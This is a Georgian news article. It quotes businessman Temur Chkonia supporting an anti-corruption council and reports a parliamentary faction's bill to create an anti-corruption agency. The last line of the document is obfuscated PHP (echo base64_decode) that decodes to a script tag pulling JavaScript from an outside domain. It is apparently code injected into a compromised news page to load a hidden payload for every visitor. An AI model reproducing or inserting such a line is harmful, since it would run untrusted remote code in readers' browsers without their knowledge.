celsiusi
ავერსი საქკაბელი
“კოკა-კოლა ბოთლერს ჯორჯიას” დამფუძნებელი, ბიზნესმენი თემურ ჭყონია მიიჩნევს რომ ქვეყანაში აიტიკორუფციული საბჭოს შექმნა აუცილებელია:
 
“ეს არის ყველზე სერიოზული გადაწყვეტილება და ანტიკორუფციული საბჭოს გარშემო შეკრებილნი უნდა იყვნენ პირველ რიგში პროფესიონალი და წესიერი ადამიანები. ეს კომისია აუცილებლად შესაქმნელია და საზოგადოებამ მხარი უნდა დაუჭიროს. ვინც ანტიკორუფციული საბჭოს შექმნას მხარს არ დაუჭერს, ეს ნიშნავს იმას რომ რაღაცას ერიდება ან კვლევა არ უნდა, რადგან ამ საბჭოს შექმნა აუციელებელია.”
 
2 ივნისს პარლამენტში ფრაქცია “ლელო – პარტნიორობა საქართველოსთვის” ანტიკორუფციული სააგენტოს შექმნის კანონპროექტი დაარეგისტრირა.
 
ეროვნული ანტიკორუფციული სააგენტოს შექმნის შესახებ ინიციატივა წინა მოწვევის პარლამენტის დამოუკიდებელმა დეპუტატებმა თამარ ჩუგოშვილმა, თამარ ხულორდავამ, ირინე ფრუიძემ, ნინო გოგუაძემ და დიმიტრი ცქიტიშვილმაც დააინიცირეს. თუმცა პარლამენტმა კანონპროექტი არ დაამტკიცა. აღნიშნული პოროექტის თანაავტორია არასამთავრობო ორგანიზაცია “საერთაშორისო გამჭვირვალობა – საქართველო”.
 
კანონპროექტი სამ მიმართულებას მოიცავდა:
 
კორუფციული დანაშაულების გამოძიება;
პოლიტიკური პარტიების დაფინანსების კონტროლის რეფორმა;
თანამდებობის პირების ქონებრივი დეკლარაციების მონიტორინგი
“ლელო – პარტნიორობა საქართველოსთვის”ასევე გამოდის ინიციატივით, რომ პარლამენტში შეიქმნას ანტიკორუფციული საგამოძიებო კომისია, “რომელიც ამოიღებს ყველა იმ საქმეს, რომელიც არის გაჩერებული, თაროზე შემოდებული და საზოგადოებას მისცემს ძალიან მკაფიო პასუხს, თუ ვინ იპარავს საქართველოში ბიუჯეტს, რა სქემები მუშაობს საქართველოში”.
1188
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");